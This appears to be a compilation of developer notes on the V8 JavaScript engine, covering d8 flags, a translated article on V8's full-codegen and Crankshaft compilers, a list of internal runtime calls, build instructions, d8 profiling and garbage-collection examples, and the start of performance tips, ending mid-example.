type: bool default: false --stack_trace_on_illegal (print stack trace when an illegal exception is thrown) type: bool default: false --abort_on_uncaught_exception (abort program (dump core) when an uncaught exception is thrown) type: bool default: false --randomize_hashes (randomize hashes to avoid predictable hash collisions (with snapshots this option cannot override the baked-in seed)) type: bool default: true --hash_seed (Fixed seed to use to hash property keys (0 means random)(with snapshots this option cannot override the baked-in seed)) type: int default: 0 --runtime_call_stats (report runtime call counts and times) type: bool default: false --profile_deserialization (Print the time it takes to deserialize the snapshot.) type: bool default: false --serialization_statistics (Collect statistics on serialized objects.) type: bool default: false --regexp_optimization (generate optimized regexp code) type: bool default: true --testing_bool_flag (testing_bool_flag) type: bool default: true --testing_maybe_bool_flag (testing_maybe_bool_flag) type: maybe_bool default: unset --testing_int_flag (testing_int_flag) type: int default: 13 --testing_float_flag (float-flag) type: float default: 2.5 --testing_string_flag (string-flag) type: string default: Hello, world! --testing_prng_seed (Seed used for threading test randomness) type: int default: 42 --testing_serialization_file (file in which to serialize heap) type: string default: /tmp/serdes --startup_src (Write V8 startup as C++ src. (mksnapshot only)) type: string default: NULL --startup_blob (Write V8 startup blob file. (mksnapshot only)) type: string default: NULL --profile_hydrogen_code_stub_compilation (Print the time it takes to lazily compile hydrogen code stubs.) 
type: bool default: false --predictable (enable predictable mode) type: bool default: false --force_marking_deque_overflows (force overflows of marking deque by reducing it's size to 64 words) type: bool default: false --stress_compaction (stress the GC compactor to flush out bugs (implies --force_marking_deque_overflows)) type: bool default: false --manual_evacuation_candidates_selection (Test mode only flag. It allows an unit test to select evacuation candidates pages (requires --stress_compaction).) type: bool default: false --external_allocation_limit_incremental_time (Time spent in incremental marking steps (in ms) once the external allocation limit is reached) type: int default: 1 --disable_old_api_accessors (Disable old-style API accessors whose setters trigger through the prototype chain) type: bool default: false --help (Print usage message, including flags, on console) type: bool default: true --dump_counters (Dump counters on exit) type: bool default: false --map_counters (Map counters to a file) type: string default: --js_arguments (Pass all remaining arguments to the script. Alias for "--".) 
type: arguments default: --gdbjit (enable GDBJIT interface) type: bool default: false --gdbjit_full (enable GDBJIT interface for all code objects) type: bool default: false --gdbjit_dump (dump elf objects with debug info to disk) type: bool default: false --gdbjit_dump_filter (dump only objects containing this substring) type: string default: --enable_slow_asserts (enable asserts that are slow to execute) type: bool default: false --print_source (pretty print source code) type: bool default: false --print_builtin_source (pretty print source code for builtins) type: bool default: false --print_ast (print source AST) type: bool default: false --print_builtin_ast (print source AST for builtins) type: bool default: false --trap_on_abort (replace aborts by breakpoints) type: bool default: false --print_builtin_scopes (print scopes for builtins) type: bool default: false --print_scopes (print scopes) type: bool default: false --trace_contexts (trace contexts operations) type: bool default: false --gc_verbose (print stuff during garbage collection) type: bool default: false --heap_stats (report heap statistics before and after GC) type: bool default: false --code_stats (report code statistics after GC) type: bool default: false --print_handles (report handles after GC) type: bool default: false --check_handle_count (Check that there are not too many handles at GC) type: bool default: false --print_global_handles (report global handles after GC) type: bool default: false --print_turbo_replay (print C++ code to recreate TurboFan graphs) type: bool default: false --trace_turbo_escape (enable tracing in escape analysis) type: bool default: false --trace_normalization (prints when objects are turned into dictionaries.) 
type: bool default: false --trace_lazy (trace lazy compilation) type: bool default: false --collect_heap_spill_statistics (report heap spill statistics along with heap_stats (requires heap_stats)) type: bool default: false --trace_live_bytes (trace incrementing and resetting of live bytes) type: bool default: false --trace_isolates (trace isolate state changes) type: bool default: false --regexp_possessive_quantifier (enable possessive quantifier syntax for testing) type: bool default: false --trace_regexp_bytecodes (trace regexp bytecode execution) type: bool default: false --trace_regexp_assembler (trace regexp macro assembler calls.) type: bool default: false --trace_regexp_parser (trace regexp parsing) type: bool default: false --print_break_location (print source location on debug break) type: bool default: false --log (Minimal logging (no API, code, GC, suspect, or handles samples).) type: bool default: false --log_all (Log all events to the log file.) type: bool default: false --log_api (Log API events to the log file.) type: bool default: false --log_code (Log code events to the log file without profiling.) type: bool default: false --log_gc (Log heap samples on garbage collection for the hp2ps tool.) type: bool default: false --log_handles (Log global handle events.) type: bool default: false --log_snapshot_positions (log positions of (de)serialized objects in the snapshot.) type: bool default: false --log_suspect (Log suspect operations.) type: bool default: false --prof (Log statistical profiling information (implies --log-code).) type: bool default: false --prof_cpp (Like --prof, but ignore generated code.) type: bool default: false --prof_browser_mode (Used with --prof, turns on browser-compatible mode for profiling.) type: bool default: true --log_regexp (Log regular expression execution.) type: bool default: false --logfile (Specify the name of the log file.) type: string default: v8.log --logfile_per_isolate (Separate log files for each isolate.) 
type: bool default: true --ll_prof (Enable low-level linux profiler.) type: bool default: false --perf_basic_prof (Enable perf linux profiler (basic support).) type: bool default: false --perf_basic_prof_only_functions (Only report function code ranges to perf (i.e. no stubs).) type: bool default: false --gc_fake_mmap (Specify the name of the file for fake gc mmap used in ll_prof) type: string default: /tmp/__v8_gc__ --log_internal_timer_events (Time internal events.) type: bool default: false --log_timer_events (Time events including external callbacks.) type: bool default: false --log_instruction_stats (Log AArch64 instruction statistics.) type: bool default: false --log_instruction_file (AArch64 instruction statistics log file.) type: string default: arm64_inst.csv --log_instruction_period (AArch64 instruction statistics logging period.) type: int default: 4194304 --redirect_code_traces (output deopt information and disassembly into file code-<pid>-<isolate id>.asm) type: bool default: false --redirect_code_traces_to (output deopt information and disassembly into the given file) type: string default: NULL --hydrogen_track_positions (track source code positions when building IR) type: bool default: false --trace_elements_transitions (trace elements transitions) type: bool default: false --trace_creation_allocation_sites (trace the creation of allocation sites) type: bool default: false --print_code_stubs (print code stubs) type: bool default: false --test_secondary_stub_cache (test secondary stub cache by disabling the primary one) type: bool default: false --test_primary_stub_cache (test primary stub cache by disabling the secondary one) type: bool default: false --print_code (print generated code) type: bool default: false --print_opt_code (print optimized code) type: bool default: false --print_unopt_code (print unoptimized code before printing optimized code based on it) type: bool default: false --print_code_verbose (print more information for code) type: 
bool default: false --print_builtin_code (print generated code for builtins) type: bool default: false --sodium (print generated code output suitable for use with the Sodium code viewer) type: bool default: false --print_all_code (enable all flags related to printing code) type: bool default: false
Pull a specific V8 branch
After running
fetch v8
do
cd v8
git checkout -b ch2681
git checkout -b track_2681 origin/chromium/2681
git fetch
v8: a tale of two compilers
@http://wingolog.org/archives/2011/07/05/v8-a-tale-of-two-compilers
this article and all articles in this site were mostly translated by Google translate with a little human polishing.
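Regular readers will have noticed my fascination with the V8 JavaScript implementation. It is indeed an impressive piece of engineering.
When V8 was originally announced, Lars Bak wrote:
I hope the web community will adopt the code and the ideas we have developed to advance the performance of JavaScript. Raising the performance bar of JavaScript is important for continued innovation of web applications.
V8 has succeeded not only in adoption but also, to a remarkable degree, in "raising the performance bar" among all JavaScript implementations.
But as William Gibson says, "The future is already here - it's just not very evenly distributed." Many parts of V8 are not documented at all, which is perhaps understandable given the pace at which things change. So as I get up to speed with V8 for my work with Igalia, I have been trying to document the interesting things I find, so that all JavaScript implementations can learn and improve.
Indeed, this study of V8 has given me lots of ideas and motivation. So perhaps V8's new motto should be "making the world's code faster, one compiler at a time".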
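Compiler the first: full-codegen
V8 compiles all JavaScript to native code. V8 has two compilers: one that runs fast and produces generic code, and one that does not run as fast but tries to produce optimized code.
The quick-and-simple compiler is known internally as the "full-codegen" compiler. It takes as its input the abstract syntax tree (AST) of a function, walks over the nodes in the AST, and emits calls to a macro assembler directly. Here's a picture: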
http://wingolog.org/pub/v8-full-codegen.svg
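The boxes represent the flow of data in the compilation process. There are only two boxes because, as we said, it's a simple compiler. All local variables are stored either on the stack or on the heap, not in registers. Any variable referenced by a nested function is stored on the heap, in the context object associated with the function in which the variable was defined.
The compiler emits loads and stores to pull these values into registers to actually do the work. The top of the stack of temporaries is cached in a register. Complicated cases are handled by emitting calls to runtime procedures. The compiler tracks the context in which an expression is being evaluated, so that tests can jump directly to the consequent blocks instead of pushing a value, testing whether it is zero, and then branching. Small-integer arithmetic is usually inlined.
Actually, I should mention one important optimization that is done even with the full-codegen compiler, and that is inline caching. See the Hölzle, Chambers, and Ungar paper linked from http://wingolog.org/archives/2008/10/19/dynamic-dispatch-a-followup. Inline caches are used for assignments, unary and binary operations, function calls, property accesses, and comparisons.
The inline caches also serve as sources of type information used by the optimizing compiler. For some statement types, such as assignments, the only purpose of the IC is to record type information.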
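As a rough illustration of the inline-cache idea described above, here is a toy model in plain JavaScript. It is a sketch under stated assumptions, not V8's implementation: objects are modeled as a shape plus a slot array, and the names makeShape, makeObject and makeLoadSite are hypothetical.

```javascript
// Toy model of a monomorphic inline cache for a property load.
// Objects are modeled as { shape, slots }, where shape.offsets maps a
// property name to an index into slots. All names here are hypothetical.
function makeShape(names) {
  const offsets = new Map();
  names.forEach((name, index) => offsets.set(name, index));
  return { offsets };
}

function makeObject(shape, values) {
  return { shape, slots: values.slice() };
}

// Returns a load function for one "site" plus hit/miss counters.
function makeLoadSite(name) {
  const stats = { hits: 0, misses: 0 };
  let cachedShape = null;
  let cachedOffset = -1;

  function load(obj) {
    if (obj.shape === cachedShape) {
      stats.hits++; // fast path: one comparison, one indexed read
      return obj.slots[cachedOffset];
    }
    stats.misses++; // slow path: full lookup, then update the cache
    const offset = obj.shape.offsets.get(name);
    if (offset === undefined) return undefined;
    cachedShape = obj.shape;
    cachedOffset = offset;
    return obj.slots[offset];
  }

  return { load, stats };
}

const pointShape = makeShape(['x', 'y']);
const site = makeLoadSite('y');
const first = makeObject(pointShape, [1, 2]);
const second = makeObject(pointShape, [3, 4]);
const results = [site.load(first), site.load(second), site.load(first)];
console.log(results, site.stats);
```

Only the first load takes the slow path; the later loads see the same shape and reuse the cached offset. The cached shape is also exactly the kind of type information an optimizing compiler could read back later.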
ast.h
The abstract syntax tree.
full-codegen.h
full-codegen.cc
full-codegen-ia32.cc
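The full-codegen compiler. Most of the meat of the full-codegen compiler is in the target-specific directory (4257 lines vs 769 + 1323 lines). Currently supported targets are ia32, x64, arm, and mips.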
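Type feedback
The first time V8 sees a function, it parses it to an AST but doesn't actually do anything with it. It only runs the full-codegen compiler when the function is first run. How's that for lazy! But once things have started up, it kicks off a profiler thread to see how things are going and which functions are hot.
This lazy, sit-back-and-watch approach gives V8 time to record the type information flowing through it. So by the time it has decided that a function is hot and could use a little more help, it has type information to pass to the compiler.
Runtime type feedback information is recorded by and stored in the inline caches (ICs). Type feedback information is represented internally as an 8-bit value, constructed in such a way that a hierarchy of types can be detected with a simple bitmask. At this point the best I can do is show the artwork from the source: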
//         Unknown
//           |   \____________
//           |                |
//      Primitive       Non-primitive
//           |   \_______     |
//           |           |    |
//        Number       String |
//         /   \         |    |
//    Double  Integer32  |   /
//        |      |      /   /
//        |     Smi    /   /
//        |      |    / __/
//        Uninitialized.
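Every time an IC stub sees a new kind of value, it computes the type of that value and bitwise-ANDs it with the old type. The initial type value is Uninitialized. So if an IC only sees integers in the Smi (small integer) range, the recorded type will indicate that. But as soon as it sees a double value, the type becomes Number; and if it then sees an object, the type becomes Unknown. A non-primitive IC necessarily stores the map of the receiver type in the IC, for dispatch purposes. Type feedback can parse the IC stub to get at this map when needed.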
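The bitwise-AND trick can be sketched in a few lines. The bit patterns below are an assumption chosen for illustration, picked so that AND-ing two types yields their nearest common ancestor in the lattice above; they are not quoted from V8's source, and typeOfValue is a hypothetical classifier.

```javascript
// Toy 8-bit type-feedback lattice. AND-ing two entries moves "up" the
// lattice toward Unknown. Bit patterns are illustrative assumptions.
const TypeInfo = {
  Unknown:       0x00,
  Primitive:     0x10,
  Number:        0x11,
  Integer32:     0x13,
  Smi:           0x17,
  Double:        0x19,
  String:        0x30,
  NonPrimitive:  0x40,
  Uninitialized: 0x7f,
};

// Hypothetical classifier mapping a JavaScript value to a lattice entry.
function typeOfValue(value) {
  if (typeof value === 'number') {
    if (Number.isInteger(value)) {
      if (value >= -(2 ** 30) && value < 2 ** 30) return TypeInfo.Smi;
      if (value >= -(2 ** 31) && value < 2 ** 31) return TypeInfo.Integer32;
    }
    return TypeInfo.Double;
  }
  if (typeof value === 'string') return TypeInfo.String;
  if ((typeof value === 'object' && value !== null) || typeof value === 'function') {
    return TypeInfo.NonPrimitive;
  }
  return TypeInfo.Primitive; // booleans, undefined, null, symbols, bigints
}

// What an IC would do each time it sees a value.
function combine(recorded, value) {
  return recorded & typeOfValue(value);
}

function nameOf(bits) {
  return Object.keys(TypeInfo).find((key) => TypeInfo[key] === bits);
}

let recorded = TypeInfo.Uninitialized;
const history = [];
for (const value of [1, 2, 3.5, { x: 1 }]) {
  recorded = combine(recorded, value);
  history.push(nameOf(recorded));
}
console.log(history.join(' -> '));
```

The recorded type can only move toward Unknown, never back down, which is why a single stray double or object at a site permanently widens the feedback for that site.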
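Type feedback information is associated with a particular AST node (an assignment, a property load, and so on). An integer identifier for the node is serialized into the IC, so that when V8 decides that a function is hot, it can parse the recorded type information out of the full-codegen code and associate it with the AST node.
Now, this process is a bit complicated. It needs support up and down your compiler stack. You need to have inline caches. Your inline caches need to support type information, both for operands and for the result. You need to be able to walk this data to find the values. Then you need to link it back to the AST, so that when you pass the AST to your optimizing compiler, the compiler is able to ask the right questions.
The concrete strategy that V8 takes is to parse the data into a TypeFeedbackOracle object, associating information with particular AST nodes. Then V8 visits all of the AST nodes with this oracle, and the nodes themselves parse out the data that they might find useful from the oracle.
In the end one is able to, for example, ask a Property node whether it is monomorphic, and in any case what the receiver types at that node are. It seems that this works well for V8, because it reduces the number of moving parts in the optimizing compiler, given that it doesn't need to hold the TypeFeedbackOracle itself.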
type-info.h
The TypeInfo 8-bit data type and the TypeFeedbackOracle declaration. I have to admit, I really like the use of C++ within V8. It's a nasty tool, but they wield it well.
type-info.cc
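The implementation of TypeFeedbackOracle. See ProcessTarget at the bottom of the file in particular.
Also check the ast.h link to see how type feedback ties into the AST itself.
Crankshaft = type feedback + Hydrogen + Lithium
Once V8 has identified that a function is hot and has collected some type feedback information, it tries to run the augmented AST through an optimizing compiler. This optimizing compiler is called Crankshaft, though that name rarely appears in the source itself.
Instead, in the source, Crankshaft consists of the Hydrogen high-level intermediate representation (IR), the Lithium low-level IR, and their associated compilers.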
Like this:
http://wingolog.org/pub/v8-crankshaft.svg
(I believe that the names Hydrogen and Lithium come from High- and Low-level, respectively.)
It depends on your background, but you might have seen a diagram like this before:
http://www.stanford.edu/class/cs343/resources/java-hotspot.pdf
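Indeed, I believe that Crankshaft was highly influenced by the changes that Sun introduced into the HotSpot client compiler in Java 6. Let me quote a passage from the 2008 paper by Kotzmann et al. on the design of the HotSpot client compiler:
First, a high-level intermediate representation (HIR) of the compiled method is built via an abstract interpretation of the bytecodes. It consists of a control-flow graph (CFG), whose basic blocks are singly linked lists of instructions. The HIR is in static single-assignment (SSA) form, which means that for every variable there is just a single point in the program where a value is assigned to it. An instruction that loads or computes a value represents both the operation and its result, so that operands can be represented as pointers to previous instructions. Both during and after generation of the HIR, several optimizations are performed, such as constant folding, value numbering, method inlining, and null check elimination. They benefit from the simple structure of the HIR and the SSA form. The back end of the compiler translates the optimized HIR into a low-level intermediate representation (LIR). The LIR is conceptually similar to machine code, but still mostly platform-independent. In contrast to HIR instructions, LIR operations operate on virtual registers instead of references to previous instructions. The LIR facilitates various low-level optimizations and is the input for the linear scan register allocator, which maps virtual registers to physical ones.
This statement describes Crankshaft very neatly, and the rest of section 2 of that paper applies in a general sense. Of course there are some differences. Crankshaft starts with the AST, not bytecodes. The HotSpot client runtime does not use type feedback to help its compiler, as it is less necessary for Java, though it would still be helpful. Crankshaft doesn't do very much with exception handlers.
But the similarities are such that V8 can actually produce traces that can be read by c1visualizer (docs), a program used to visualize the internals of the HotSpot client compiler. (The client compiler appears to be known internally as c1; the server compiler appears to be opto.)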
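To make the quoted description of a high-level IR a little more concrete, here is a minimal sketch of constant folding over an SSA-style instruction list. The instruction set (const, param, add, mul) and the function foldConstants are invented for illustration; neither Hydrogen nor the HotSpot HIR is claimed to look like this.

```javascript
// Toy SSA-style instruction list: each instruction is its own result, and
// operands are references to earlier instructions (here: array indices).
// The instruction set is invented for illustration.
function foldConstants(instructions) {
  const out = [];
  instructions.forEach((ins) => {
    if (ins.op === 'add' || ins.op === 'mul') {
      const left = out[ins.left];
      const right = out[ins.right];
      if (left.op === 'const' && right.op === 'const') {
        const value = ins.op === 'add'
          ? left.value + right.value
          : left.value * right.value;
        out.push({ op: 'const', value }); // replace the operation by its result
        return;
      }
    }
    out.push(ins); // anything else is kept unchanged
  });
  return out;
}

const hir = [
  { op: 'const', value: 2 },        // v0
  { op: 'const', value: 3 },        // v1
  { op: 'add', left: 0, right: 1 }, // v2 = v0 + v1
  { op: 'param', index: 0 },        // v3
  { op: 'mul', left: 2, right: 3 }, // v4 = v2 * v3
];
const folded = foldConstants(hir);
console.log(folded);
```

Because every value has a single definition, the pass only has to look at the defining instructions of the two operands. v2 folds to a constant, while v4 stays a multiplication because v3 is unknown until run time.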
v8 native calls
https://github.com/Nathanaela/v8-Natives/blob/master/lib/v8-native-calls.js
isNative: function() { return true },
getOptimizationStatus: function(fun) {
return %GetOptimizationStatus(fun);
},
getOptimizationCount: function(fun) {
return %GetOptimizationCount(fun);
},
optimizeFunctionOnNextCall: function(fun) {
return %OptimizeFunctionOnNextCall(fun);
},
deoptimizeFunction: function(fun) {
return %DeoptimizeFunction(fun);
},
deoptimizeNow: function() {
return %DeoptimizeNow();
},
clearFunctionTypeFeedback: function(fun) {
return %ClearFunctionTypeFeedback(fun);
},
debugPrint: function(data) {
return %DebugPrint(data);
},
debugTrace: function() {
return %DebugTrace();
},
collectGarbage: function() {
return %CollectGarbage(null);
},
getHeapUsage: function() {
return %GetHeapUsage();
},
hasFastProperties: function(data) {
return %HasFastProperties(data);
},
hasFastSmiElements: function(data) {
return %HasFastSmiElements(data);
},
hasFastObjectElements: function(data) {
return %HasFastObjectElements(data);
},
hasFastDoubleElements: function(data) {
return %HasFastDoubleElements(data);
},
hasDictionaryElements: function(data) {
return %HasDictionaryElements(data);
},
hasFastHoleyElements: function(data) {
return %HasFastHoleyElements(data);
},
hasFastSmiOrObjectElements: function(data) {
return %HasFastSmiOrObjectElements(data);
},
hasSloppyArgumentsElements: function(data) {
return %HasSloppyArgumentsElements(data);
},
haveSameMap: function(data1, data2) {
return %HaveSameMap(data1, data2);
},
functionGetName: function(func) {
return %FunctionGetName(func);
},
isSmi: function(data) {
return %_IsSmi(data);
},
isValidSmi: function(data) {
return %IsValidSmi(data);
},
neverOptimizeFunction: function(func) {
return %NeverOptimizeFunction(func);
},
getV8Version: function() {
return %GetV8Version();
},
isObserved: function(data) {
return %IsObserved(data);
},
setFlags: function(flag) {
return %SetFlags(flag);
},
traceEnter: function() {
return %TraceEnter();
},
traceExit: function(val) {
return %TraceExit(val);
},
getThreadCount: function() {
return %GetThreadCount(0);
}
Translations of some V8 documentation
@from
https://gist.github.com/kevincennis/0cd2138c78a07412ef21
Installing V8 on a Mac
Prerequisites
Install Xcode (available on the Mac App Store)
Install the Xcode Command Line Tools (Preferences > Downloads)
Install depot_tools
git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git
sudo nano ~/.bash_profile
Add export PATH=/path/to/depot_tools:"$PATH" (important)
source ~/.bash_profile
From the directory you want to install V8 into, run gclient
Build V8
fetch v8
cd v8
gclient sync
tools/dev/v8gen.py x64.optdebug
ninja -C out.gn/x64.optdebug
(prepare for lots of fan noise)
I’d also recommend adding some aliases to your .bash_profile:
sudo nano ~/.bash_profile
Add
alias d8=/path/to/v8/repo/out.gn/x64.optdebug/d8
Add
alias tick-processor=/path/to/v8/repo/tools/mac-tick-processor
source ~/.bash_profile
d8 shell examples
Print optimization stats
Create test.js with the following code:
function test( obj ) {
  return obj.prop + obj.prop;
}
var a = { prop: 'a' }, i = 0;
while ( i++ < 10000 ) {
  test( a );
}
Run
d8 --trace-opt-verbose test.js
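You should see that the test function was optimized by V8, along with an explanation of why. "IC" stands for inline cache, which is one of the ways V8 performs optimizations. Generally speaking, the more ICs with "typeinfo" the better.
Now modify test.js to include the following code:
function test( obj ) {
  return obj.prop + obj.prop;
}
var a = { prop: 'a' }, b = { prop: [] }, i = 0;
while ( i++ < 10000 ) {
  test( Math.random() > 0.5 ? a : b );
}
Run
d8 --trace-opt-verbose test.js
This time you'll see that the test function was never actually optimized. The reason is that it is being passed objects with different hidden classes. Try changing the value in prop to an integer and run it again. You should see that the function can be optimized.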
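Print deoptimization stats
Modify the contents of test.js:
function test( obj ) {
  return obj.prop + obj.prop;
}
var a = { prop: 'a' }, b = { prop: [] }, i = 0;
while ( i++ < 10000 ) {
  test( i !== 8000 ? a : b );
}
Run
d8 --trace-opt --trace-deopt test.js
You should see that the optimized code for the test function was thrown away. What happened here is that V8 kept seeing test being passed an object that looked like {prop: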
Profiling
Modify test.js:
function factorial( n ) {
  return n === 1 ? n : n * factorial( --n );
}
var i = 0;
while ( i++ < 1e7 ) {
  factorial( 10 );
}
Run
time d8 --prof test.js
(Generates v8.log)
Run
tick-processor
(Reads v8.log and cats the parsed output)
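This shows where the program spent most of its time, by function. Most of it should be under LazyCompile: *factorial test.js:1:19. The asterisk before the function name means that the function was optimized.
Make a note of the execution time that was logged to the terminal. Now try modifying the code to this silly, contrived example:
function factorial( n ) {
  return equal( n, 1 ) ? n : multiply( n, factorial( --n ) );
}
function multiply( x, y ) {
  return x * y;
}
function equal( a, b ) {
  return a === b;
}
var i = 0;
while ( i++ < 1e7 ) {
  factorial( 10 );
}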
Run
time d8 --prof test.js
Run
tick-processor
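Roughly the same execution time as the last version, even though the extra function calls make it seem like this example should be slower. You'll also notice that the multiply and equal functions are nowhere to be found in the list. Weird, right?
Run d8 --trace-inlining test.js
We can see that the optimizing compiler was smart here and completely eliminated the overhead of calling those two functions by inlining them into the optimized code for factorial. The optimized code for both versions ends up being basically identical (which you can check, if you know how to read assembly, by running d8 --print-opt-code test.js).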
Tracing Garbage Collection
Modify test.js
function strToArray( str ) {
  var i = 0, len = str.length, arr = new Uint16Array( str.length );
  for ( ; i < len; ++i ) {
    arr[ i ] = str.charCodeAt( i );
  }
  return arr;
}
var i = 0, str = 'V8 is the coolest';
while ( i++ < 1e5 ) {
  strToArray( str );
}
Run
d8 --trace-gc test.js
You’ll see a bunch of
Scavenge... [allocation failure].
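Basically, V8's GC heap has different "spaces". Most objects are allocated in the "new space". Allocation here is very cheap, but the space is also small (usually somewhere between 1 and 8 MB). Once that space fills up, the GC does a "Scavenge".
Scavenges are the fast part of V8 garbage collection. From what I've seen, they usually take between 1 and 5 ms, so they might not necessarily cause a noticeable GC pause.
Scavenges can only be triggered by allocations. If the "new space" never fills up, the GC never needs to reclaim space by scavenging.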
Modify test.js:
function strToArray( str, bufferView ) {
  var i = 0, len = str.length;
  for ( ; i < len; ++i ) {
    bufferView[ i ] = str.charCodeAt( i );
  }
  return bufferView;
}
var i = 0,
  str = 'V8 is the coolest',
  buffer = new ArrayBuffer( str.length * 2 ),
  bufferView = new Uint16Array( buffer );
while ( i++ < 1e5 ) {
  strToArray( str, bufferView );
}
Here we use a pre-allocated ArrayBuffer and an associated ArrayBufferView (a Uint16Array in this case) to avoid allocating a new object every time strToArray() runs. The result is that we allocate almost nothing.
Run d8 --trace-gc test.js
Nothing. We never filled up the "new space", so we never had to scavenge.
Try one more thing in test.js:
function strToArray( str ) {
  var i = 0, len = str.length, arr = new Uint16Array( str.length );
  for ( ; i < len; ++i ) {
    arr[ i ] = str.charCodeAt( i );
  }
  return arr;
}
var i = 0, str = 'V8 is the coolest', arr = [];
while ( i++ < 1e6 ) {
  strToArray( str );
  if ( i % 100000 === 0 ) {
    // save a long-term reference to a random, huge object
    arr.push( new Uint16Array( 100000000 ) );
    // release references about 5% of the time
    Math.random() > 0.95 && ( arr.length = 0 );
  }
}
Run d8 --trace-gc test.js
You should see plenty of Scavenges, because we are no longer using a pre-allocated buffer. But there should also be a bunch of Mark-sweep lines.
Mark-sweep is the "full" GC. It runs when the "old space" heap reaches a certain size, and it takes a lot longer than a Scavenge. If you look at the logs, you'll probably see Scavenge at around 1.5 ms and Mark-sweep closer to 25 or 30 ms.
Since the frame budget in a web app is about 16 ms, you're guaranteed to drop at least 1 frame every time Mark-sweep runs.
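The frame-budget arithmetic can be checked with a small helper. This is only a sketch: it assumes a 60 frames-per-second target, and framesDropped is a hypothetical name.

```javascript
// Frame-budget arithmetic at an assumed 60 frames per second.
const FRAME_BUDGET_MS = 1000 / 60; // about 16.67 ms per frame

// Number of frame deadlines missed when a frame that needs `workMs` of
// its own work also has to absorb a GC pause of `pauseMs`.
function framesDropped(pauseMs, workMs = 0) {
  const total = pauseMs + workMs;
  return Math.max(0, Math.ceil(total / FRAME_BUDGET_MS) - 1);
}

console.log(framesDropped(1.5)); // a typical Scavenge fits inside one frame
console.log(framesDropped(25));  // a Mark-sweep pause overruns the frame
console.log(framesDropped(40));
```

With the pause lengths quoted above, a 1.5 ms Scavenge costs no frames on its own, while a 25 to 30 ms Mark-sweep always spills into the next frame.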
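Miscellaneous
d8 --help logs all available d8 flags
There's a ton of text there, but you can usually find what you're looking for with something like d8 --help | grep followed by a search term.
d8 --allow-natives-syntax file.js
This actually lets you call V8 internal methods from within your JS file, like this:
function factorial( n ) {
  return n === 1 ? n : factorial( --n );
}
var i = 0;
while ( i++ < 1e8 ) {
  factorial( 10 );
  // run a full Mark-sweep pass every 10MM iterations
  i % 1e7 === 0 && %CollectGarbage( null );
}
...and run d8 --allow-natives-syntax --trace-gc test.js
Native functions are prefixed with the % symbol. Here is a (somewhat incomplete) list of native functions.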
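Logging
d8 doesn't have a console object (or a window object). But you can use print().
Comparing hidden classes
This is probably my favorite one. I actually just found it.
So in V8 there's this concept of "hidden classes" (explained a few paragraphs in). You should read that article, but basically hidden classes are how V8 (SpiderMonkey and JavaScriptCore use similar techniques too) determines whether two objects have the same "shape".
All things considered, you always want to pass objects of the same hidden class as arguments to your functions.
Anyway, you can actually compare the hidden classes of two objects:
function Class( val ) {
  this.prop = val;
}
var a = new Class('foo');
var b = new Class('bar');
print( %HaveSameMap( a, b ) );
b.prop2 = 'baz';
print( %HaveSameMap( a, b ) );
Run d8 --allow-natives-syntax test.js
You should see true, then false. By adding b.prop2 = 'baz', we modified its structure and created a new hidden class.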
Node.js
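Many of these flags (but not all of them) work with Node. --trace-opt, --prof, and --allow-natives-syntax are all supported.
That can be helpful if you want to test something that relies on another library, since you can use Node's require().
A list of supported V8 flags can be accessed with node --v8-options.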
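Performance tips for JavaScript in V8
It's important to put any performance advice in context. Performance optimization is addictive, and sometimes focusing on deep advice first can distract from the real issues. You need to take a holistic view of the performance of your web application: before focusing on these performance tips, you should probably analyze your code with tools like PageSpeed and get your score up. This will help you avoid premature optimization.
The best basic advice for getting good performance in web applications is:
•Be prepared before you have (or notice) a problem
•Then, identify and understand the crux of your problem
•Finally, fix what matters
In order to accomplish these steps, it can be important to understand how V8 optimizes JS, so you can write code that is mindful of the JS runtime design. It's also important to learn about the tools that are available and how they can help you. Daniel's talk explains how to use the developer tools; this document just captures some of the most important points of the V8 engine design.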
Hidden Classes
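JavaScript has limited compile-time type information: types can be changed at runtime, so it's natural to expect that reasoning about JS types at compile time is expensive. This might lead you to question how JavaScript performance could ever get anywhere close to C++. However, V8 has hidden types created internally for objects at runtime; objects with the same hidden class can then use the same optimized generated code.
For example:
function Point(x, y) {
  this.x = x;
  this.y = y;
}
var p1 = new Point(11, 22);
var p2 = new Point(33, 44);
// At this point, p1 and p2 have a shared hidden class
p2.z = 55;
// warning! p1 and p2 now have different hidden classes!
Until the object instance p2 has the additional member "z" added, p1 and p2 internally have the same hidden class, so V8 can generate a single version of optimized assembly for JavaScript code that manipulates either p1 or p2. The more you can avoid causing the hidden classes to diverge, the better performance you'll obtain.
Therefore:
•Initialize all object members in constructor functions (so the instances don't change type later)
•Always initialize object members in the same order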
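Why initialization order matters can be seen in a toy model of hidden-class transitions. This is a sketch of the general idea only: the Shape and Tracked classes and the haveSameShape helper are hypothetical and do not mirror V8's internal data structures.

```javascript
// Toy model of hidden-class ("map") transitions. Every shape remembers
// which shape is reached by adding a given property name, so objects
// built the same way end up sharing one shape. All names are hypothetical.
class Shape {
  constructor(properties) {
    this.properties = properties; // property names in insertion order
    this.transitions = new Map(); // property name -> next Shape
  }
  add(name) {
    if (!this.transitions.has(name)) {
      this.transitions.set(name, new Shape([...this.properties, name]));
    }
    return this.transitions.get(name);
  }
}

const ROOT = new Shape([]);

class Tracked {
  constructor() {
    this.shape = ROOT;
    this.values = new Map();
  }
  set(name, value) {
    // Only a newly added property changes the shape.
    if (!this.values.has(name)) this.shape = this.shape.add(name);
    this.values.set(name, value);
    return this;
  }
}

function haveSameShape(a, b) {
  return a.shape === b.shape;
}

const p1 = new Tracked().set('x', 11).set('y', 22);
const p2 = new Tracked().set('x', 33).set('y', 44);
const sameBefore = haveSameShape(p1, p2); // same names, same order
p2.set('z', 55);
const sameAfter = haveSameShape(p1, p2);  // p2 moved to a new shape
const p3 = new Tracked().set('y', 1).set('x', 2);
const sameDifferentOrder = haveSameShape(p1, p3); // same names, other order
console.log(sameBefore, sameAfter, sameDifferentOrder);
```

In this model, two objects share a shape only if they added the same property names in the same order, which is the intuition behind both bullet points above.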
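Numbers
V8 uses tagging to represent values efficiently when types can change. V8 infers from the values that you use what number type you are dealing with. Once V8 has made this inference, it uses tagging to represent values efficiently, because these types can change dynamically. However, there is sometimes a cost to changing these type tags, so it's best to use number types consistently, and in general it is most efficient to use 31-bit signed integers where appropriate.
For example:
var i = 42; // this is a 31-bit signed integer
var j = 4.2; // this is a double-precision floating point number
Therefore:
·Prefer numeric values that can be represented as 31-bit signed integers.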
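A quick way to reason about the 31-bit range is a helper like the one below. It is a sketch that assumes the 31-bit signed range from the text, that is, values from -2^30 to 2^30 - 1; the range V8 actually uses can depend on the build, and fitsIn31Bits is a hypothetical name.

```javascript
// Checks whether a number fits in a 31-bit signed integer, i.e. the
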